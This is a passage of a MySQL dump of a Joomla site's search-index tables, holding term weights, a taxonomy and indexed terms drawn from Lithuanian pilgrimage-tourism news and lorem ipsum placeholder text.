INSERT INTO `xyhmu_finder_links_terms9` VALUES (1,6,1.0666),(1,7,2.7334),(1,8,1.75992),(1,9,1.12),(1,10,1.37669),(1,103,0.32669),(1,104,0.95669),(1,105,1.00331),(1,106,0.14),(1,107,1.00331),(1,108,1.21331),(1,109,0.42),(1,110,1.23669),(1,111,1.4),(2,157,0.32669),(3,157,0.32669),(4,157,0.32669),(5,157,0.32669),(2,158,1.07331),(3,158,1.07331),(4,158,1.07331),(5,158,1.07331),(2,159,1.28331),(3,159,1.28331),(4,159,1.28331),(5,159,1.28331),(2,361,0.28),(3,361,0.28),(4,361,0.28),(5,361,0.28),(2,362,0.86331),(3,362,0.86331),(4,362,0.86331),(5,362,0.86331),(2,363,1.02669),(3,363,1.02669),(4,363,1.02669),(5,363,1.02669),(2,364,0.91),(3,364,0.91),(4,364,0.91),(5,364,0.91),(2,365,1.07331),(3,365,1.07331),(4,365,1.07331),(5,365,1.07331),(2,366,0.23331),(3,366,0.23331),(4,366,0.23331),(5,366,0.23331),(2,367,0.93331),(3,367,0.93331),(4,367,0.93331),(5,367,0.93331),(2,368,1.14331),(3,368,1.14331),(4,368,1.14331),(5,368,1.14331),(2,369,0.28),(3,369,0.28),(4,369,0.28),(5,369,0.28),(2,370,0.95669),(3,370,0.95669),(4,370,0.95669),(5,370,0.95669),(2,371,1.14331),(3,371,1.14331),(4,371,1.14331),(5,371,1.14331),(2,372,0.18669),(3,372,0.18669),(4,372,0.18669),(5,372,0.18669),(2,373,0.91),(3,373,0.91),(4,373,0.91),(5,373,0.91),(2,374,0.98),(3,374,0.98),(4,374,0.98),(5,374,0.98),(2,375,0.37331),(3,375,0.37331),(4,375,0.37331),(5,375,0.37331),(2,376,0.95669),(3,376,0.95669),(4,376,0.95669),(5,376,0.95669),(2,377,1.07331),(3,377,1.07331),(4,377,1.07331),(5,377,1.07331),(2,378,0.42),(3,378,0.42),(4,378,0.42),(5,378,0.42),(2,379,1.05),(3,379,1.05),(4,379,1.05),(5,379,1.05),(2,380,1.16669),(3,380,1.16669),(4,380,1.16669),(5,380,1.16669);
/*!40000 ALTER TABLE `xyhmu_finder_links_terms9` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termsa`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termsa`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termsa` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termsa`
--

LOCK TABLES `xyhmu_finder_links_termsa` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termsa` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termsa` VALUES (5,733,0.17);
/*!40000 ALTER TABLE `xyhmu_finder_links_termsa` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termsb`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termsb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termsb` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termsb`
--

LOCK TABLES `xyhmu_finder_links_termsb` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termsb` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termsb` VALUES (6,764,1.36),(6,765,2.55),(6,766,3.4);
/*!40000 ALTER TABLE `xyhmu_finder_links_termsb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termsc`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termsc`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termsc` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termsc`
--

LOCK TABLES `xyhmu_finder_links_termsc` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termsc` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termsc` VALUES (2,2,0.34),(1,2,0.74),(2,128,0.17),(3,639,0.17),(4,702,1.48),(4,703,5.67321),(4,704,6.29),(6,761,0.34);
/*!40000 ALTER TABLE `xyhmu_finder_links_termsc` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termsd`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termsd`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termsd` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termsd`
--

LOCK TABLES `xyhmu_finder_links_termsd` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termsd` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termsd` VALUES (1,1,0),(2,1,0),(3,1,0),(4,1,0),(5,1,0),(6,1,0),(1,57,0.42),(1,58,1.12),(1,59,1.37669),(1,60,0.37331),(1,61,1.16669),(1,62,1.23669),(2,316,0.18669),(3,316,0.18669),(4,316,0.18669),(5,316,0.18669),(2,317,1.02669),(3,317,1.02669),(4,317,1.02669),(5,317,1.02669),(2,318,1.12),(3,318,1.12),(4,318,1.12),(5,318,1.12),(3,670,0.49321),(3,671,4.56321),(3,672,5.30321),(4,712,0.98679),(4,713,4.93321),(4,714,5.55),(5,715,0.8),(4,715,1.48),(4,716,5.05679),(4,717,5.79679),(5,747,2.5334),(5,748,2.8666),(5,749,0.90661),(5,750,2.43661),(5,751,2.60661);
/*!40000 ALTER TABLE `xyhmu_finder_links_termsd` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termse`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termse`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termse` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termse`
--

LOCK TABLES `xyhmu_finder_links_termse` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termse` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termse` VALUES (1,90,0.60669),(1,91,1.19),(1,92,1.4),(1,93,0.51331),(1,94,1.02669),(1,95,1.35331),(1,96,0.32669),(1,97,1.07331),(1,98,1.35331),(1,99,1.97321),(6,99,1.97321),(1,100,5.92),(1,101,6.90679),(2,200,0.09331),(3,200,0.09331),(4,200,0.09331),(5,200,0.09331),(2,201,0.93331),(3,201,0.93331),(4,201,0.93331),(5,201,0.93331),(2,202,1.16669),(3,202,1.16669),(4,202,1.16669),(5,202,1.16669),(2,203,0.18669),(3,203,1.17348),(4,203,1.17348),(5,203,1.17348),(2,204,0.88669),(3,204,5.57348),(4,204,5.57348),(5,204,5.57348),(2,205,1.00331),(3,205,1.00331),(4,205,1.00331),(5,205,1.00331),(2,206,0.18669),(3,206,0.18669),(4,206,0.18669),(5,206,0.18669),(2,207,0.86331),(3,207,0.86331),(4,207,0.86331),(5,207,0.86331),(2,208,1.00331),(3,208,1.00331),(4,208,1.00331),(5,208,1.00331),(2,209,0.18669),(3,209,0.18669),(4,209,0.18669),(5,209,0.18669),(2,210,1.00331),(3,210,1.00331),(4,210,1.00331),(5,210,1.00331),(2,211,1.07331),(3,211,1.07331),(4,211,1.07331),(5,211,1.07331),(2,212,0.18669),(3,212,0.18669),(4,212,0.18669),(5,212,0.18669),(2,213,0.86331),(3,213,0.86331),(4,213,0.86331),(5,213,0.86331),(2,214,1.07331),(3,214,1.07331),(4,214,1.07331),(5,214,1.07331),(2,215,0.18669),(3,215,0.18669),(4,215,0.18669),(5,215,0.18669),(2,216,1.00331),(3,216,1.00331),(4,216,1.00331),(5,216,1.00331),(2,217,1.23669),(3,217,1.23669),(4,217,1.23669),(5,217,1.23669),(2,218,0.18662),(3,218,0.18662),(4,218,0.18662),(5,218,0.18662),(2,219,0.95669),(3,219,0.95669),(4,219,0.95669),(5,219,0.95669),(2,220,1.02669),(3,220,1.02669),(4,220,1.02669),(5,220,1.02669),(2,221,0.88669),(3,221,0.88669),(4,221,0.88669),(5,221,0.88669),(2,222,1.00331),(3,222,1.00331),(4,222,1.00331),(5,222,1.00331),(2,223,0.09331),(3,223,0.09331),(4,223,0.09331),(5,223,0.09331),(2,224,0.93331),(3,224,0.93331),(4,224,0.93331),(5,224,0.93331),(2,225,1.07331),(3,225,1.07331),(4,225,1.07331),(5,225,1.07331),(2,226,0.32669),(3,226,0.32669),(4,226,0.32669),(5,226,0.32669),(2,227,1.09669),(3,227,1.09669),(4,227,1.09669),(5,227,1.09669),(2,228,1.16669),(3,228,1.16669),(4,228,1.16669),(5,228,1.16669),(2,229,0.14),(3,229,0.14),(4,229,0.14),(5,229,0.14),(2,230,0.93331),(3,230,0.93331),(4,230,0.93331),(5,230,0.93331),(2,231,1.07331),(3,231,1.07331),(4,231,1.07331),(5,231,1.07331),(2,232,0.09331),(3,232,0.09331),(4,232,0.09331),(5,232,0.09331),(2,233,0.81669),(3,233,0.81669),(4,233,0.81669),(5,233,0.81669),(2,234,1.00331),(3,234,1.00331),(4,234,1.00331),(5,234,1.00331),(2,235,0.28),(3,235,0.28),(4,235,0.28),(5,235,0.28),(2,236,1.00331),(3,236,1.00331),(4,236,1.00331),(5,236,1.00331),(2,237,1.28331),(3,237,1.28331),(4,237,1.28331),(5,237,1.28331),(2,342,0.28),(3,342,0.28),(4,342,0.28),(5,342,0.28),(2,343,1.12),(3,343,1.12),(4,343,1.12),(5,343,1.12),(2,344,1.33),(3,344,1.33),(4,344,1.33),(5,344,1.33),(2,345,0.09331),(3,345,0.09331),(4,345,0.09331),(5,345,0.09331),(2,346,0.93331),(3,346,0.93331),(4,346,0.93331),(5,346,0.93331),(2,347,1.07331),(3,347,1.07331),(4,347,1.07331),(5,347,1.07331),(2,348,0.42),(3,348,0.42),(4,348,0.42),(5,348,0.42),(2,349,0.98),(3,349,0.98),(4,349,0.98),(5,349,0.98),(2,350,1.16669),(3,350,1.16669),(4,350,1.16669),(5,350,1.16669),(3,661,1.72679),(4,661,1.72679),(5,661,1.72679),(3,662,5.42679),(4,662,5.42679),(5,662,5.42679),(3,663,5.05679),(4,663,5.05679),(5,663,5.05679),(3,675,1.48),(4,675,1.48),(5,675,1.48),(4,705,0.17),(6,770,6.29),(6,771,6.66);
/*!40000 ALTER TABLE `xyhmu_finder_links_termse` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_links_termsf`
--

DROP TABLE IF EXISTS `xyhmu_finder_links_termsf`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_links_termsf` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_links_termsf`
--

LOCK TABLES `xyhmu_finder_links_termsf` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_links_termsf` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_links_termsf` VALUES (2,381,0.18669),(3,381,0.18669),(4,381,0.18669),(5,381,0.18669),(2,382,0.91),(3,382,0.91),(4,382,0.91),(5,382,0.91),(2,383,0.98),(3,383,0.98),(4,383,0.98),(5,383,0.98),(2,384,0.23331),(3,384,0.23331),(4,384,0.23331),(5,384,0.23331),(2,385,1.00331),(3,385,1.00331),(4,385,1.00331),(5,385,1.00331),(2,386,1.14331),(3,386,1.14331),(4,386,1.14331),(5,386,1.14331);
/*!40000 ALTER TABLE `xyhmu_finder_links_termsf` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_taxonomy`
--

DROP TABLE IF EXISTS `xyhmu_finder_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_taxonomy` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL,
  `state` tinyint(1) unsigned NOT NULL DEFAULT '1',
  `access` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` tinyint(1) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `parent_id` (`parent_id`),
  KEY `state` (`state`),
  KEY `ordering` (`ordering`),
  KEY `access` (`access`),
  KEY `idx_parent_published` (`parent_id`,`state`,`access`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_taxonomy`
--

LOCK TABLES `xyhmu_finder_taxonomy` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_taxonomy` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_taxonomy` VALUES (1,0,'ROOT',0,0,0),(2,1,'Type',1,1,0),(3,2,'K2 Item',1,1,0),(4,1,'Author',1,1,0),(5,4,'Super User',1,1,0),(6,1,'K2 Category',1,1,0),(7,6,'Latest News',1,1,0),(8,1,'Language',1,1,0),(9,8,'*',1,1,0);
/*!40000 ALTER TABLE `xyhmu_finder_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_taxonomy_map`
--

DROP TABLE IF EXISTS `xyhmu_finder_taxonomy_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_taxonomy_map` (
  `link_id` int(10) unsigned NOT NULL,
  `node_id` int(10) unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`node_id`),
  KEY `link_id` (`link_id`),
  KEY `node_id` (`node_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_taxonomy_map`
--

LOCK TABLES `xyhmu_finder_taxonomy_map` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_taxonomy_map` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_taxonomy_map` VALUES (1,3),(1,5),(1,7),(1,9),(2,3),(2,5),(2,7),(2,9),(3,3),(3,5),(3,7),(3,9),(4,3),(4,5),(4,7),(4,9),(5,3),(5,5),(5,7),(5,9),(6,3),(6,5),(6,7),(6,9);
/*!40000 ALTER TABLE `xyhmu_finder_taxonomy_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_finder_terms`
--

DROP TABLE IF EXISTS `xyhmu_finder_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_finder_terms` (
  `term_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `term` varchar(75) NOT NULL,
  `stem` varchar(75) NOT NULL,
  `common` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `phrase` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `weight` float unsigned NOT NULL DEFAULT '0',
  `soundex` varchar(75) NOT NULL,
  `links` int(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  UNIQUE KEY `idx_term` (`term`),
  KEY `idx_term_phrase` (`term`,`phrase`),
  KEY `idx_stem_phrase` (`stem`,`phrase`),
  KEY `idx_soundex_phrase` (`soundex`,`phrase`)
) ENGINE=InnoDB AUTO_INCREMENT=772 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_finder_terms`
--

LOCK TABLES `xyhmu_finder_terms` WRITE;
/*!40000 ALTER TABLE `xyhmu_finder_terms` DISABLE KEYS */;
INSERT INTO `xyhmu_finder_terms` VALUES (1,'','',0,0,0,'',16),(2,'25','25',0,0,0.2,'',7),(3,'7-9','7-9',0,0,0.3,'',6),(4,'7-9 d','7-9 d',0,1,1.1667,'D000',6),(5,'7-9 d pristatatė','7-9 d pristatatė',0,1,1.5333,'D1623',6),(6,'balttour','balttour',0,0,0.5333,'B436',6),(7,'balttour 25','balttour 25',0,1,1.3667,'B436',6),(8,'balttour\'25','balttour',0,0,0.7333,'B436',6),(9,'balttour\'25 stendo','balttour stendo',0,1,1.6,'B4362353',6),(10,'balttour\'25 stendo lankytojai','balttour stendo lankytojai',0,1,1.9667,'B436235345232',6),(11,'centras','centras',0,0,0.4667,'C5362',6),(12,'centras dalyvavo','centras dalyvavo',0,1,1.5333,'C5362341',6),(13,'centras dalyvavo parodoje','centras dalyvavo parodoje',0,1,1.8333,'C5362341632',6),(14,'centras\'','centras',0,0,0.5333,'C5362',6),(15,'centras\' vasario','centras vasario',0,1,1.5333,'C5362126',6),(16,'centras\' vasario 7-9','centras vasario 7-9',0,1,1.6667,'C5362126',6),(17,'d','d',0,0,0.0667,'D000',6),(18,'d pristatatė','d pristatatė',0,1,1.4,'D1623',6),(19,'d pristatatė kelmės','d pristatatė kelmės',0,1,1.6333,'D16232452',6),(20,'dalyvavo','dalyvavo',0,0,0.5333,'D410',6),(21,'dalyvavo loterijoje','dalyvavo loterijoje',0,1,1.6333,'D414362',6),(22,'dalyvavo parodoje','dalyvavo parodoje',0,1,1.5667,'D41632',6),(23,'dalyvavo parodoje balttour','dalyvavo parodoje balttour',0,1,1.8667,'D416321436',6),(24,'dalyvavo parodoje balttour\'25','dalyvavo parodoje balttour',0,1,1.9667,'D416321436',6),(25,'domėjosi','domėjosi',0,0,0.5333,'D520',6),(26,'domėjosi lankytinais','domėjosi lankytinais',0,1,1.6667,'D52452352',6),(27,'domėjosi lankytinais objektais','domėjosi lankytinais objektais',0,1,2,'D524523521232',6),(28,'index','index',0,0,0.3333,'I532',16),(29,'ir','ir',0,0,0.1333,'I600',12),(30,'ir piligriminius','ir piligriminius',0,1,1.5333,'I6142652',6),(31,'ir piligriminius maršrutus','ir piligriminius maršrutus',0,1,1.8667,'I61426525632',6),(32,'item','item',0,0,0.2667,'I350',16),(33,'k2','k2',0,0,0.1333,'K000',16),(34,'k2 item','k2 item',0,1,1.2333,'K350',16),(35,'kelmės','kelmės',0,0,0.4,'K452',6),(36,'kelmės kraštą','kelmės kraštą',0,1,1.4333,'K45263',6),(37,'kelmės kraštą pagrindinius','kelmės kraštą pagrindinius',0,1,1.8667,'K452631265352',6),(38,'kraštą','kraštą',0,0,0.4,'K630',6),(39,'kraštą pagrindinius','kraštą pagrindinius',0,1,1.6333,'K631265352',6),(40,'kraštą pagrindinius lankytinus','kraštą pagrindinius lankytinus',0,1,2,'K631265352452352',6),(41,'lankytinais','lankytinais',0,0,0.7333,'L52352',6),(42,'lankytinais objektais','lankytinais objektais',0,1,1.7,'L523521232',6),(43,'lankytinais objektais dalyvavo','lankytinais objektais dalyvavo',0,1,2,'L523521232341',6),(44,'lankytinus','lankytinus',0,0,0.6667,'L52352',6),(45,'lankytinus objektus','lankytinus objektus',0,1,1.6333,'L523521232',6),(46,'lankytinus objektus turistinius','lankytinus objektus turistinius',0,1,2,'L523521232362352',6),(47,'lankytojai','lankytojai',0,0,0.6667,'L5232',6),(48,'lankytojai domėjosi','lankytojai domėjosi',0,1,1.6333,'L5232352',6),(49,'lankytojai domėjosi lankytinais','lankytojai domėjosi lankytinais',0,1,2,'L5232352452352',6),(50,'latest','latest',0,0,0.4,'L323',16),(51,'latest news','latest news',0,1,1.3667,'L32352',16),(52,'loterijoje','loterijoje',0,0,0.6667,'L362',6),(53,'maršrutus','maršrutus',0,0,0.6,'M632',6),(54,'maršrutus rygoje','maršrutus rygoje',0,1,1.5333,'M63262',6),(55,'maršrutus rygoje vykusioje','maršrutus rygoje vykusioje',0,1,1.8667,'M6326212',6),(56,'news','news',0,0,0.2667,'N200',16),(57,'objektais','objektais',0,0,0.6,'O1232',6),(58,'objektais dalyvavo','objektais dalyvavo',0,1,1.6,'O1232341',6),(59,'objektais dalyvavo loterijoje','objektais dalyvavo loterijoje',0,1,1.9667,'O12323414362',6),(60,'objektus','objektus',0,0,0.5333,'O1232',6),(61,'objektus turistinius','objektus turistinius',0,1,1.6667,'O1232362352',6),(62,'objektus turistinius ir','objektus turistinius ir',0,1,1.7667,'O12323623526',6),(63,'pagrindinius','pagrindinius',0,0,0.8,'P265352',6),(64,'pagrindinius lankytinus','pagrindinius lankytinus',0,1,1.7667,'P265352452352',6),(65,'pagrindinius lankytinus objektus','pagrindinius lankytinus objektus',0,1,2,'P2653524523521232',6),(66,'parodoje','parodoje',0,0,0.5333,'P632',6),(67,'parodoje balttour','parodoje balttour',0,1,1.5667,'P6321436',6),(68,'parodoje balttour 25','parodoje balttour 25',0,1,1.6667,'P6321436',6),(69,'parodoje balttour\'25','parodoje balttour',0,1,1.6667,'P6321436',6),(70,'parodoje balttour\'25 stendo','parodoje balttour stendo',0,1,1.9,'P63214362353',6),(71,'piligriminius','piligriminius',0,0,0.8667,'P42652',6),(72,'piligriminius maršrutus','piligriminius maršrutus',0,1,1.7667,'P426525632',6),(73,'piligriminius maršrutus rygoje','piligriminius maršrutus rygoje',0,1,2,'P42652563262',6),(74,'piligrimu','piligrimu',0,0,0.6,'P4265',6),(75,'piligrimu centras','piligrimu centras',0,1,1.5667,'P426525362',6),(76,'piligrimu centras dalyvavo','piligrimu centras dalyvavo',0,1,1.8667,'P426525362341',6),(77,'piligrimų centras\'','piligrimų centras',0,1,1.6,'P426525362',6),(78,'piligrimų centras\' vasario','piligrimų centras vasario',0,1,1.8667,'P426525362126',6),(79,'pristatatė','pristatatė',0,0,0.6667,'P623',6),(80,'pristatatė kelmės','pristatatė kelmės',0,1,1.5667,'P6232452',6),(81,'pristatatė kelmės kraštą','pristatatė kelmės kraštą',0,1,1.8,'P623245263',6),(82,'rygoje','rygoje',0,0,0.4,'R200',6),(83,'rygoje vykusioje','rygoje vykusioje',0,1,1.5333,'R212',6),(84,'rygoje vykusioje tarptautinėje','rygoje vykusioje tarptautinėje',0,1,2,'R212361352',6),(85,'stendo','stendo',0,0,0.4,'S353',6),(86,'stendo lankytojai','stendo lankytojai',0,1,1.5667,'S35345232',6),(87,'stendo lankytojai domėjosi','stendo lankytojai domėjosi',0,1,1.8667,'S35345232352',6),(88,'super','super',0,0,0.3333,'S160',16),(89,'super user','super user',0,1,1.3333,'S1626',16),(90,'tarptautinėje','tarptautinėje',0,0,0.8667,'T61352',6),(91,'tarptautinėje turizmo','tarptautinėje turizmo',0,1,1.7,'T613523625',6),(92,'tarptautinėje turizmo parodoje','tarptautinėje turizmo parodoje',0,1,2,'T6135236251632',6),(93,'turistinius','turistinius',0,0,0.7333,'T62352',6),(94,'turistinius ir','turistinius ir',0,1,1.4667,'T623526',6),(95,'turistinius ir piligriminius','turistinius ir piligriminius',0,1,1.9333,'T623526142652',6),(96,'turizmo','turizmo',0,0,0.4667,'T625',6),(97,'turizmo parodoje','turizmo parodoje',0,1,1.5333,'T6251632',6),(98,'turizmo parodoje balttour\'25','turizmo parodoje balttour',0,1,1.9333,'T62516321436',6),(99,'tytuvenu','tytuvenu',0,0,0.5333,'T150',12),(100,'tytuvenu piligrimu','tytuvenu piligrimu',0,1,1.6,'T1514265',6),(101,'tytuvenu piligrimu centras','tytuvenu piligrimu centras',0,1,1.8667,'T151426525362',6),(102,'user','user',0,0,0.2667,'U260',16),(103,'vasario','vasario',0,0,0.4667,'V260',6),(104,'vasario 7-9','vasario 7-9',0,1,1.3667,'V260',6),(105,'vasario 7-9 d','vasario 7-9 d',0,1,1.4333,'V263',6),(106,'všį','všį',0,0,0.2,'V000',6),(107,'všį piligrimų','všį piligrimų',0,1,1.4333,'V4265',6),(108,'všį piligrimų centras\'','všį piligrimų centras',0,1,1.7333,'V426525362',6),(109,'vykusioje','vykusioje',0,0,0.6,'V200',6),(110,'vykusioje tarptautinėje','vykusioje tarptautinėje',0,1,1.7667,'V2361352',6),(111,'vykusioje tarptautinėje turizmo','vykusioje tarptautinėje turizmo',0,1,2,'V23613523625',6),(128,'1','1',0,0,0.1,'',1),(129,'accumsan','accumsan',0,0,0.5333,'A2525',4),(130,'accumsan et','accumsan et',0,1,1.3667,'A25253',4),(131,'accumsan et iusto','accumsan et iusto',0,1,1.5667,'A2525323',4),(132,'ad','ad',0,0,0.1333,'A300',4),(133,'ad minim','ad minim',0,1,1.2667,'A350',4),(134,'ad minim veniam','ad minim veniam',0,1,1.5,'A3515',4),(135,'adipiscing','adipiscing',0,0,0.6667,'A31252',4),(136,'adipiscing elit','adipiscing elit',0,1,1.5,'A3125243',4),(137,'adipiscing elit sed','adipiscing elit sed',0,1,1.6333,'A312524323',4),(138,'aliquam','aliquam',0,0,0.4667,'A425',4),(139,'aliquam erat','aliquam erat',0,1,1.4,'A42563',4),(140,'aliquam erat volutpat','aliquam erat volutpat',0,1,1.7,'A4256314313',4),(141,'aliquip','aliquip',0,0,0.4667,'A421',4),(142,'aliquip ex','aliquip ex',0,1,1.3333,'A4212',4),(143,'aliquip ex ea','aliquip ex ea',0,1,1.4333,'A4212',4),(144,'amet','amet',0,0,0.2667,'A530',4),(145,'amet consectetuer','amet consectetuer',0,1,1.5667,'A5325236',4),(146,'amet consectetuer adipiscing','amet consectetuer adipiscing',0,1,1.9333,'A532523631252',4),(147,'analysis','analysis',0,0,0.5333,'A542',1),(148,'at','at',0,0,0.1333,'A300',4),(149,'at vero','at vero',0,1,1.2333,'A316',4),(150,'at vero eros','at vero eros',0,1,1.4,'A3162',4),(151,'augue','augue',0,0,0.3333,'A200',4),(152,'augue duis','augue duis',0,1,1.3333,'A232',4),(153,'augue duis dolore','augue duis dolore',0,1,1.5667,'A232346',4),(154,'autem','autem',0,0,0.3333,'A350',4),(155,'autem vel','autem vel',0,1,1.3,'A3514',4),(156,'autem vel eum','autem vel eum',0,1,1.4333,'A35145',4),(157,'blandit','blandit',0,0,0.4667,'B453',4),(158,'blandit praesent','blandit praesent',0,1,1.5333,'B45316253',4),(159,'blandit praesent luptatum','blandit praesent luptatum',0,1,1.8333,'B453162534135',4),(160,'career','career',0,0,0.4,'C600',1),(161,'career fair','career fair',0,1,1.3667,'C616',1),(162,'career fair set','career fair set',0,1,1.5,'C61623',1),(163,'commodo','commodo',0,0,0.4667,'C530',4),(164,'commodo consequat','commodo consequat',0,1,1.5667,'C532523',4),(165,'commodo consequat duis','commodo consequat duis',0,1,1.7333,'C5325232',4),(166,'consectetuer','consectetuer',0,0,0.8,'C5236',4),(167,'consectetuer adipiscing','consectetuer adipiscing',0,1,1.7667,'C523631252',4),(168,'consectetuer adipiscing elit','consectetuer adipiscing elit',0,1,1.9333,'C52363125243',4),(169,'consequat','consequat',0,0,0.6,'C523',4),(170,'consequat duis','consequat duis',0,1,1.4667,'C5232',4),(171,'consequat duis autem','consequat duis autem',0,1,1.6667,'C523235',4),(172,'consequat vel','consequat vel',0,1,1.4333,'C52314',4),(173,'consequat vel illum','consequat vel illum',0,1,1.6333,'C523145',4),(174,'delenit','delenit',0,0,0.4667,'D453',4),(175,'delenit augue','delenit augue',0,1,1.4333,'D4532',4),(176,'delenit augue duis','delenit augue duis',0,1,1.6,'D453232',4),(177,'diam','diam',0,0,0.2667,'D500',4),(178,'diam nonummy','diam nonummy',0,1,1.4,'D500',4),(179,'diam nonummy nibh','diam nonummy nibh',0,1,1.5667,'D510',4),(180,'dignissim','dignissim',0,0,0.6,'D2525',4),(181,'dignissim qui','dignissim qui',0,1,1.4333,'D25252',4),(182,'dignissim 